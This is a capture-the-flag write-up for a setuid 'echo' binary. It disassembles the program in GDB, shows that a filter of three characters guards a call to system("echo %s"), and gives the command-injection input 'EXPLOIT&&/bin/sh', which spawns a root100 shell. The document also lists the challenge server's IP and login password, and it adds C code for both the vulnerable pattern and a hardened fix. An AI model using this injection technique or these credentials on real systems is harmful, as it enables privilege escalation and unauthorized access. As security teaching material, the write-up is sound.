############################################
The developer wrote an echo program.
However, because of careless security settings, the program contains a vulnerability.
Find the vulnerability and obtain a SHELL.
Access IP : 175.119.227.56
Access PORT : 10222
Access ID : system100
Access PW : !kisa_system_gogosing~!!!
############################################
Once you connect to the server:
-bash-4.1$ ls -l
total 8
-r-sr-x--- 1 root100 system100 7841 Apr 7 2014 system100
A file named system100 is visible. It is a set-uid executable owned by root100, and it appears to be the echo program mentioned above.
-bash-4.1$ ./system100
ECHO Program------------------
INPUT : hello kisa?
hello kisa?
When run, it simply returns the string I typed.
Let's look at how it works under GDB.
------------------------------------------------------------------------
-bash-4.1$ gdb -q ./system100
/home/system100/.gdbinit:1: Error in sourced command file:
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-tracing...
Reading symbols from /home/system100/system100...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0000000000400744 <+0>: push rbp
0x0000000000400745 <+1>: mov rbp,rsp
0x0000000000400748 <+4>: push rbx
0x0000000000400749 <+5>: sub rsp,0x1b8
0x0000000000400750 <+12>: mov DWORD PTR [rbp-0x1b4],edi
0x0000000000400756 <+18>: mov QWORD PTR [rbp-0x1c0],rsi
0x000000000040075d <+25>: mov edi,0x400958
0x0000000000400762 <+30>: call 0x4005c8 <puts@plt>
0x0000000000400767 <+35>: mov eax,0x400977
0x000000000040076c <+40>: mov rdi,rax
0x000000000040076f <+43>: mov eax,0x0
0x0000000000400774 <+48>: call 0x4005b8 <printf@plt>
0x0000000000400779 <+53>: mov rax,QWORD PTR [rip+0x2004f8] # 0x600c78 <stdin@@GLIBC_2.2.5>
0x0000000000400780 <+60>: mov rdx,rax
0x0000000000400783 <+63>: lea rax,[rbp-0x80]
0x0000000000400787 <+67>: mov esi,0x64
0x000000000040078c <+72>: mov rdi,rax
0x000000000040078f <+75>: call 0x400608 <fgets@plt>
0x0000000000400794 <+80>: lea rax,[rbp-0x80]
0x0000000000400798 <+84>: mov esi,0x3b
0x000000000040079d <+89>: mov rdi,rax
0x00000000004007a0 <+92>: call 0x400638 <strchr@plt>
0x00000000004007a5 <+97>: test rax,rax
0x00000000004007a8 <+100>: jne 0x4007d6 <main+146>
0x00000000004007aa <+102>: lea rax,[rbp-0x80]
0x00000000004007ae <+106>: mov esi,0x60
0x00000000004007b3 <+111>: mov rdi,rax
0x00000000004007b6 <+114>: call 0x400638 <strchr@plt>
0x00000000004007bb <+119>: test rax,rax
0x00000000004007be <+122>: jne 0x4007d6 <main+146>
0x00000000004007c0 <+124>: lea rax,[rbp-0x80]
0x00000000004007c4 <+128>: mov esi,0x27
0x00000000004007c9 <+133>: mov rdi,rax
0x00000000004007cc <+136>: call 0x400638 <strchr@plt>
0x00000000004007d1 <+141>: test rax,rax
0x00000000004007d4 <+144>: je 0x4007ea <main+166>
0x00000000004007d6 <+146>: mov edi,0x400980
0x00000000004007db <+151>: call 0x4005c8 <puts@plt>
0x00000000004007e0 <+156>: mov edi,0x0
0x00000000004007e5 <+161>: call 0x4005d8 <exit@plt>
0x00000000004007ea <+166>: mov ecx,0x400992
0x00000000004007ef <+171>: lea rdx,[rbp-0x80]
0x00000000004007f3 <+175>: lea rax,[rbp-0x1b0]
0x00000000004007fa <+182>: mov rsi,rcx
0x00000000004007fd <+185>: mov rdi,rax
0x0000000000400800 <+188>: mov eax,0x0
0x0000000000400805 <+193>: call 0x400628 <sprintf@plt>
0x000000000040080a <+198>: mov eax,0x0
0x000000000040080f <+203>: call 0x400618 <geteuid@plt>
0x0000000000400814 <+208>: mov ebx,eax
0x0000000000400816 <+210>: mov eax,0x0
0x000000000040081b <+215>: call 0x400618 <geteuid@plt>
0x0000000000400820 <+220>: mov esi,ebx
0x0000000000400822 <+222>: mov edi,eax
0x0000000000400824 <+224>: mov eax,0x0
0x0000000000400829 <+229>: call 0x400648 <setreuid@plt>
0x000000000040082e <+234>: lea rax,[rbp-0x1b0]
0x0000000000400835 <+241>: mov rdi,rax
0x0000000000400838 <+244>: mov eax,0x0
0x000000000040083d <+249>: call 0x4005f8 <system@plt>
0x0000000000400842 <+254>: mov eax,0x0
0x0000000000400847 <+259>: add rsp,0x1b8
0x000000000040084e <+266>: pop rbx
0x000000000040084f <+267>: leave
0x0000000000400850 <+268>: ret
------------------------------------------------------------------------
0x00000000004007a0 <+92>: call 0x400638 <strchr@plt>
0x00000000004007a5 <+97>: test rax,rax
0x00000000004007a8 <+100>: jne 0x4007d6 <main+146>
0x00000000004007aa <+102>: lea rax,[rbp-0x80]
0x00000000004007ae <+106>: mov esi,0x60
0x00000000004007b3 <+111>: mov rdi,rax
0x00000000004007b6 <+114>: call 0x400638 <strchr@plt>
0x00000000004007bb <+119>: test rax,rax
0x00000000004007be <+122>: jne 0x4007d6 <main+146>
0x00000000004007c0 <+124>: lea rax,[rbp-0x80]
0x00000000004007c4 <+128>: mov esi,0x27
0x00000000004007c9 <+133>: mov rdi,rax
0x00000000004007cc <+136>: call 0x400638 <strchr@plt>
Here, if strchr finds a character matching 0x3b, 0x60 or 0x27 in the input, the program prints the string "Access Denied!!!!" and exits.
Those characters are, respectively, [ ; ` ' ].
(gdb) r
Starting program: /home/system100/system100
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000
ECHO Program------------------
INPUT : '
Access Denied!!!!
And looking at this part, a string shows up (the 0x400992 part):
0x00000000004007ea <+166>: mov ecx,0x400992
(gdb) x/s 0x400992
0x400992 <__dso_handle+66>: "echo %s"
So it writes "echo %s" (where %s will be the string I entered) into some char buffer and then
0x000000000040082e <+234>: lea rax,[rbp-0x1b0]
0x0000000000400835 <+241>: mov rdi,rax
0x0000000000400838 <+244>: mov eax,0x0
0x000000000040083d <+249>: call 0x4005f8 <system@plt>
executes it through the system function, it seems.
That means we have to get a root100 shell through system().
Here several commands need to run in one go (in this case, echo and sh).
So let's insert "&&" so that two commands are executed.
-bash-4.1$ echo asdf && echo qwer
asdf
qwer
( We can see that both commands run. )
-bash-4.1$ ./system100
ECHO Program------------------
INPUT : EXPLOIT&&/bin/sh
EXPLOIT
sh-4.1$ id
uid=502(root100) gid=500(system100) groups=502(root100),500(system100)
sh-4.1$ whoami
root100
sh-4.1$ cat /home/root100/root100_key
??????????????????????????????
Cleared!
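As an added illustration (not the challenge binary's source, which is not available; reconstructed from the disassembly above), the following C shows the filter-then-system() shape beside a hardened version that never invokes a shell. The buffer sizes are taken from the stack layout (fgets reads 0x64 bytes; the sprintf target at rbp-0x1b0 has 0x130 bytes before the input buffer at rbp-0x80), and the function names are mine.

```c
#include <stdio.h>
#include <string.h>

/* Reconstruction of the filter at main+92..+144: only ';' (0x3b),
 * '`' (0x60) and '\'' (0x27) are rejected. Returns 1 when the input
 * would be refused with "Access Denied!!!!". */
int rejected_by_filter(const char *input)
{
    return strchr(input, ';') != NULL
        || strchr(input, '`') != NULL
        || strchr(input, '\'') != NULL;
}

/* Vulnerable shape: the string main+166..+193 builds with sprintf("echo %s")
 * and hands to system(). Returns NULL when the filter blocks the input.
 * Nothing here runs a shell; it only shows what system() would receive.
 * A three-character blacklist leaves &&, ||, |, $( ) and newline intact. */
const char *build_shell_command(const char *input, char *out, size_t outlen)
{
    if (rejected_by_filter(input))
        return NULL;
    snprintf(out, outlen, "echo %s", input);
    return out;
}

/* Hardened form: the program only needs to echo, so it never needs a shell.
 * Copy the line verbatim (minus the newline fgets leaves in place) into the
 * output buffer; shell metacharacters are inert data here. */
const char *safe_echo(const char *input, char *out, size_t outlen)
{
    size_t n = strcspn(input, "\n");
    if (n >= outlen)
        n = outlen - 1;
    memcpy(out, input, n);
    out[n] = '\0';
    return out;
}

int main(void)
{
    char line[0x64], cmd[0x130], echoed[0x64];
    fputs("INPUT : ", stdout);
    if (!fgets(line, sizeof line, stdin))
        return 1;
    if (build_shell_command(line, cmd, sizeof cmd))
        printf("system() would receive: %s", cmd);
    else
        puts("Access Denied!!!!");
    printf("safe echo: %s\n", safe_echo(line, echoed, sizeof echoed));
    return 0;
}
```

Note also that the binary calls setreuid(geteuid(), geteuid()) at main+203..+229 before system(), which is why the spawned sh keeps root100; a set-uid program that must run a subprocess should drop to the real uid first rather than raise it.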